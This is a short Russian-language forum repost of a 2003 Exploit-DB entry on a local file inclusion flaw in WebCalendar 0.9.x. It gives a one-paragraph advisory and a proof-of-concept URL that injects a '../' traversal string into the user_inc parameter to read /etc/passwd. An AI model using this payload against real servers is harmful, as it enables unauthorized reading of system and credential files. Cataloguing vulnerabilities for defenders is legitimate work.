Exploit WebCalendar 0.9.x - Local File Inclusion Information Disclosure

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
22942
Проверка EDB
  1. Пройдено
Автор
NOCONFLIC
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
null
Дата публикации
2003-07-21
Код:
source: https://www.securityfocus.com/bid/8237/info

It has been reported that an information disclosure issue exists in WebCalendar. This may allow an attacker to gain unauthorized read access to potentially sensitive information with the privileges of the web server process.

http://www.example.com/webcalendar/[filename].php?user_inc=../../../../../etc/passwd
 
Источник
www.exploit-db.com

Похожие темы